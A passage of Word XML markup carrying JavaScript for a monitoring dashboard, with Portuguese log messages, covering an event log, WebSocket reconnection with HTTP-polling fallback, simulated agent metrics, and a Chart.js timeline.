    <w:p w14:paraId="56E395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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FA5D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`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EFC1C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eventLog.appendChild(eventElement);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EA99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410188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2CBD30C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106C6C2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addEventToLog(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D99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eventLog = document.getElementById('event-log');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F81A5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eventElement = document.createElement('div');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC0F9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eventElement.className = 'event-item';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A4D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eventElement.style.opacity = '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F4D19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eventElement.innerHTML = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151902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class="w-8 h-8 rounded-full flex items-center justify-center mr-3" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6F38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style="background: ${event.color || '#00F5FF'}20; color: ${event.color || '#00F5FF'};"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E414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${event.icon || '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>'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE02E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6F74F5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class="flex-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F5E4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class="font-medium"&gt;${event.message}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185380D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class="text-xs opacity-75"&gt;${event.timestamp}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568396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112D81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`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BC99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736626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eventLog.insertBefore(eventElement, eventLog.firstChild);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D221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86B40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Animate in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A5E1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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CE36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eventElement.style.opacity = '1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B47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eventElement.style.transform = 'translateX(0)';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8283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}, 100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C04A9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59E1A4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Remove old events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406EF05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while (eventLog.children.length &gt; 10) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0769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eventLog.removeChild(eventLog.lastChild);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6679D8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6B7BBB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4C866E6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172025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showMicroUpdate(message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4758DA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popup = document.getElementById('micro-update');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CA582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popup.textContent = message;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA464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popup.classList.add('show');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBDB7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553FB9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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B6F27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popup.classList.remove('show');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8166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}, 2000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F96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04273F4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506725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animateCounter(elementId, targetValue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201342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element = document.getElementById(elementId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE9D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(!element) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003BDA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1334BE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currentValue = parseInt(element.textContent.replace(/,/g, '')) || 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698503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2EF502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(targetValue !== currentValue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0877A0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(typeof countUp !== 'undefined' &amp;&amp; countUp.CountUp) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7045AD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countUpInstance = new countUp.CountUp(elementId, targetValue, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2A9A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startVal: currentValue,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4977C2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duration: 1.5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D99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separator: ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B78C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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499769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countUpInstance.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C06F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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0175B9F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element.textContent = targetValue.toLocaleString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6BD7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7026E3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1EEE89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02A23B7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA908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updateProgressRing(elementId, percentage) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC890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circle = document.getElementById(elementId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5919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(circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582CCD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circumference = 2 * Math.PI * 50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D982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offset = circumference - (percentage * circumference);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387D34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circle.style.strokeDashoffset = offset;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3650BD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5276F6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8D067A9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2583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updateConnectionStatus(connected) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702EEB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indicator = document.getElementById('connection-indicator');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530A62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text = document.getElementById('connection-text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506CFC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01EBA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(indicator) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F7B6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indicator.className = connected ? 'connection-status connected' : 'connection-status';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1F4B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A9B4B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32AAC0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(text) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA848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(connected) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620225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text.textContent = 'WebSocket Conectado';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075FE0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 else if (this.httpFallbackActive) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0436B94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text.textContent = 'HTTP Polling Ativo';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426D83E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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6ACC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text.textContent = 'Reconectando...';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624751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651995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18F68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598D8DB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C3FA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attemptReconnect() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3064B8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(this.reconnectAttempts &lt; this.maxReconnectAttempts) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230F8F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this.reconnectAttempts++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27139D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console.log(`</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tentativa de reconexão ${this.reconnectAttempts}/${this.maxReconnectAttempts}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368561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setTimeout(() =&gt; this.connect(), this.reconnectDelay);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F626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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3B48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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🚫</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Máximo de tentativas de reconexão atingido. Iniciando HTTP Polling.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6055B7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this.startHttpFallback();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538048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B6CAC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321C14E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11017F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startHttpFallback() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0194FE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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Iniciando HTTP Polling como fallback...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFF49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this.httpFallbackActive = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB37D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this.updateConnectionStatus(false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD81B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30A59E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this.fetchDataHTTP();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCDE3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61AFC2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setInterval(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC239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(this.httpFallbackActive) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1621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this.fetchDataHTTP();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28053B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6BD06A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}, 5000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A55C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3E420DF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01CDCC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async fetchDataHTTP() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F369A6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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD67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const response = await fetch(`${API_BASE_URL}/api/metrics`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFA89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(response.ok) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8445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data = await response.json();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1971C2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this.updateDashboard(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3071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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📡</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Dados carregados via HTTP:', data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298CB58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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161DB7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console.error('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HTTP:', response.status);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1AEB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this.loadMockData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBA9D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7E47EB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 catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2833A4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console.error('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ao buscar dados via HTTP:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604D64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this.loadMockData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140F1C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2CCB0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192946B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F5488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loadMockData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39031A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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎭</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Carregando dados simulados...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470AB3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0A61B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mockData = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6FC2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cycle_counter: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7A5D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total_cycles: Math.floor(Math.random() * 1000) + 500,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A59FD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uptime: { days: 2, hours: 14, minutes: 32 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4951CB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cycles_per_second: Math.random() * 2 + 0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FB19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7911C4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agents: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AFD6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core: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B2D0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performance: 0.75 + Math.random() * 0.2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF349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automl_cycles: Math.floor(Math.random() * 100) + 50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D2F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last_technique: 'Neural Architecture Search'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2538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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE9D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learn: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF3C8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performance: 0.83 + Math.random() * 0.15,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166810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accuracy: 94.7 + Math.random() * 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315316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last_model: 'Transformer'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B88A7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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248270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guard: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B122C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uptime: 99.9 - Math.random() * 0.5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434782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status: 'NORMAL',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2955B4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last_protocol: 'Threat Analysis'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580D66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1531F56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38A0347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system: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75091D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performance: 75 + Math.random() * 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B536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37F914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recent_events: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69826C0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{ icon: '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🤖</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>', message: 'Core Agent otimização concluída', color: '#FF6B6B', timestamp: new Date().toLocaleTimeString() },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B76D1F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{ icon: '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>', message: 'Learn Agent modelo atualizado', color: '#9333EA', timestamp: new Date().toLocaleTimeString() },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286286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{ icon: '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>', message: 'Guard Agent verificação completa', color: '#00F5FF', timestamp: new Date().toLocaleTimeString() }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BD11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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E474D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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10861BC7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E453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this.updateDashboard(mockData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695B5D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712B46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24458765" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A67F3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CHART MANAGER =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E7E1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class ChartManager {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB95C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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A6A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this.timelineChart = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746558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this.initCharts();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFBB7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49B61AAA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A29C8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initCharts() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF5CB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ctx = document.getElementById('timelineChart').getContext('2d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73908B1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0B33E6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this.timelineChart = new Chart(ctx, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D78E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type: 'line',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2883A8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data: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDBA9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labels: Array.from({length: 24}, (_, i) =&gt; `${i}:00`),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0BEB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datasets: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A72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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1269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label: 'Core Agent',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436615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data: Array.from({length: 24}, () =&gt; Math.floor(Math.random() * 50) + 25),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5F9C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borderColor: '#FF6B6B',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75127F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backgroundColor: 'rgba(255, 107, 107, 0.1)',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B2B6A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fill: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20152A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tension: 0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F981A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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF049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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792E45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label: 'Learn Agent',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1D825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data: Array.from({length: 24}, () =&gt; Math.floor(Math.random() * 40) + 30),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1ED8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borderColor: '#9333EA',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6EACD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backgroundColor: 'rgba(147, 51, 234, 0.1)',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE9CB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fill: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704083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tension: 0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760C7D3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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582BFC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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A93AD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label: 'Guard Agent',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E799C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data: Array.from({length: 24}, () =&gt; Math.floor(Math.random() * 30) + 70),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A64D4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borderColor: '#00F5FF',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29419E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backgroundColor: 'rgba(0, 245, 255, 0.1)',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557D2B5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fill: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3D9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tension: 0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF3C4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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BFA0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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A814F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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC818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options: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006BDF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responsive: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456009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maintainAspectRatio: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10609F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plugins: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DA5C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legend: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052164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labels: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D12FFC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    color: '#ffffff'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEB22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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338AEA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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A7A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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7108C7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scales: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DA22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x: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636416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ticks: { color: '#b0c4de' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D092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grid: { color: 'rgba(255,255,255,0.1)' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099639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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6326E0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y: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657F3B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ticks: { color: '#b0c4de' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1311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grid: { color: 'rgba(255,255,255,0.1)' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F801B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min: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BAF3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max: 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19E1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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE5E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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F86CB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animation: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61499E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duration: 1000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C4E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easing: 'easeInOutQuart'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5041E5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0B0BB6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5B71C5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36A8E0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07C2D7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58D51A96" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0269D3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MODAL FUNCTIONS COM DADOS REAIS =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EFE54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async function openModal(agentName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3B7A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modal = document.getElementById('agent-modal');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE7FE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title = document.getElementById('modal-title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412553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body = document.getElementById('modal-body');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500FE529" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD72A7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Buscar dados reais da API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3585DA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console.log(`</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Abrindo modal para ${agentName} - buscando dados reais...`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B09DF2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realData = await fetchRealAgentData(agentName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C21C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5BC078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Gerar métricas com dados reais ou fallback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2978AA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metrics = generateRealMetrics(agentName, realData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152E9A73" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E7DD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agentInfo = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552992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core: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EFB7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name: 'Core Agent',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255ABF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icon: '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🤖</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257A4B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color: '#FF6B6B',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA828D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description: 'Sistema de auto-melhoria e processamento principal com algoritmos AutoML avançados',</w:t>
      </w:r>
    </w:p>
